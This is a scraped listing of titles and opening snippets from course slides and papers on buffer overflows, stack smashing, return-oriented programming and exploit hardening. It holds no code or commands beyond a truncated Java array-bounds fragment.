Q: Exploit Hardening Made Easy E.J. Schwartz, T. Avgerinos, and D. Brumley. In Proc. USENIX Security Symposium, 2011. CS 6301-002: Language-based Security Dr. Kevin Hamlen Attacker s Dilemma Problem Scenario
More informationBuffer Overflows Defending against arbitrary code insertion and execution
www.harmonysecurity.com info@harmonysecurity.com Buffer Overflows Defending against arbitrary code insertion and execution By Stephen Fewer Contents 1 Introduction 2 1.1 Where does the problem lie? 2 1.1.1
More informationBuffer overflows. Specific topics:
Buffer overflows Buffer overflows are possible because C does not check array boundaries Buffer overflows are dangerous because buffers for user input are often stored on the stack Specific topics: Address
More informationCPSC 213. Introduction to Computer Systems. Procedures and the Stack. Unit 1e
CPSC 213 Introduction to Computer Systems Unit 1e Procedures and the Stack Readings for Next 3 Lectures Textbook Procedures - 3.7 Out-of-Bounds Memory References and Buffer Overflow - 3.12 Local Variables
More informationSecure Systems Engineering
Secure Systems Engineering Chester Rebeiro Indian Institute of Technology Madras Flaws that would allow an attacker access the OS flaw Bugs in the OS The Human factor Chester Rebeiro, IITM 2 Program Bugs
More informationOutline. Memory Exploit
Outline CS 6V81-05: System Security and Malicious Code Analysis Robust Shell Code Return Oriented Programming and HeapSpray Zhiqiang Lin Department of Computer Science University of Texas at Dallas April
More informationANITA S SUPER AWESOME RECITATION SLIDES
ANITA S SUPER AWESOME RECITATION SLIDES 15/18-213: Introduction to Computer Systems Stacks and Buflab, 11 Jun 2013 Anita Zhang, Section M WHAT S NEW (OR NOT) Bomblab is due tonight, 11:59 PM EDT Your late
More informationExploits and gdb. Tutorial 5
Exploits and gdb Tutorial 5 Exploits and gdb 1. Buffer Vulnerabilities 2. Code Injection 3. Integer Attacks 4. Advanced Exploitation 5. GNU Debugger (gdb) Buffer Vulnerabilities Basic Idea Overflow or
More informationArchitecture-level Security Vulnerabilities
Architecture-level Security Vulnerabilities Björn Döbel Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The Battlefield:
More informationSelected background on ARM registers, stack layout, and calling convention
Selected background on ARM registers, stack layout, and calling convention ARM Overview ARM stands for Advanced RISC Machine Main application area: Mobile phones, smartphones (Apple iphone, Google Android),
More informationCS356: Discussion #7 Buffer Overflows. Marco Paolieri
CS356: Discussion #7 Buffer Overflows Marco Paolieri (paolieri@usc.edu) Array Bounds class Bounds { public static void main(string[] args) { int[] x = new int[10]; for (int i = 0; i
More informationBuffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.
Outline Morris Worm (1998) Infamous attacks Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 23rd January 2014 Recap Simple overflow exploit
More information